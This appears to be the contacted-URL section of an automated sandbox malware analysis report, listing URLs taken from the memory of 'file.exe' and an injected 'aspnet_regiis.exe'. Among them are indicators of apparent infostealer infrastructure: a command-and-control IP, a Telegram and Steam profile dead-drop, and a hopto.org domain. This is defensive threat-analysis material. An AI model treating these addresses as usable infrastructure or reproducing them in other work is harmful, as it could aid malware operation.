                                        https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.google.comaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                        http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://49.12.197.976561199780418869[1].htm.3.drfalseunknown
                                        https://49.12.197.9/Baspnet_regiis.exe, 00000003.00000003.1616949837.0000000003187000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.0000000003187000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://49.12.197.9JJJECAaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=easpnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://49.12.197.9GDHJDBKF--aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://steam.tv/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLKBKJKEB.3.drfalse
                                                  		unknown
                                                  https://49.12.197.9/4aspnet_regiis.exe, 00000003.00000003.1659962296.0000000003181000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://t.me/ae5edfile.exe, 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                                    http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalseunknown
                                                    https://49.12.197.9/0Hwaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://mozilla.org0/aspnet_regiis.exe, 00000003.00000002.2601605358.000000004027E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1813447953.000000000324B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1873461074.0000000003247000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2591928483.00000000284BB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2596888465.0000000034393000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2589168731.0000000022543000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                      http://www.entrust.net/rpa03file.exefalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sketchfab.comaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.1724730041.000000000326A000.00000004.00000020.00020000.00000000.sdmp, EHJKKK.3.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://49.12.197.9/msvcp140.dll=Bxaspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBKJKEB.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.youtube.com/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://steamcommunity.com/profiles/765611997804188694-aspnet_regiis.exe, 00000003.00000003.1589017924.0000000003187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amaspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.google.com/recaptcha/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://checkout.steampowered.com/aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgaspnet_regiis.exe, 00000003.00000002.2579771123.0000000003290000.00000004.00000020.00020000.00000000.sdmp, GIEBFH.3.drfalse
                                                              		unknown
                                                              https://49.12.197.9/AR:aspnet_regiis.exe, 00000003.00000003.1748296840.00000000031E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crl.entrust.net/2048ca.crl0file.exefalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://store.steampowered.com/;aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.entrust.net/rpa0file.exefalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://store.steampowered.com/about/76561199780418869[1].htm.3.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://steamcommunity.com/my/wishlist/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishaspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://ocsp.entrust.net03file.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://ocsp.entrust.net02file.exefalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://help.steampowered.com/en/aspnet_regiis.exe, 00000003.00000003.1630742439.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1617024690.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1645120437.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1589017924.000000000317A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1603235018.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1659962296.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
